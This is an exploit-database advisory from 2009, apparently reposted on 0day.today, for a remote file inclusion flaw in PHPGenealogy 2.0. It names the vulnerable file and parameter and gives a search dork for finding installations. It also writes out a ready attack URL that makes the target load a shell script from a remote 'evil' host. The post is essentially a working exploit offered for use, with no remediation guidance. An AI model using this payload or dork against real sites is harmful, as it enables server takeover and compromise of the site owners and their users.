id: 5495
date: 07/14/2009
title: PHPGenealogy 2.0 (DataDirectory) RFI Vulnerability
author: IRCRASH
cves: 

==================================================
PHPGenealogy 2.0 (DataDirectory) RFI Vulnerability
==================================================


#####################################################################################
####                           PHPGenealogy v2.0 Rfi                             ####
#####################################################################################
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#####################################################################################
#                                                                                   #
#Download : http://sourceforge.net/project/showfiles.php?group_id=98241             #
#                                                                                   #
#Dork : PHPGenealogie fonctionne sur un serveur PHP                                 #
#                                                                                   #
#####################################################################################
#                                      [Bug]                                        #
#                                                                                   #
#http://[site]/[path]/CoupleDB.php?Parametre=0&DataDirectory=http://evil/shell.txt? #
#                                                                                   #
###################################### TNX GOD ######################################



#  0day.today [2023-03-22]  #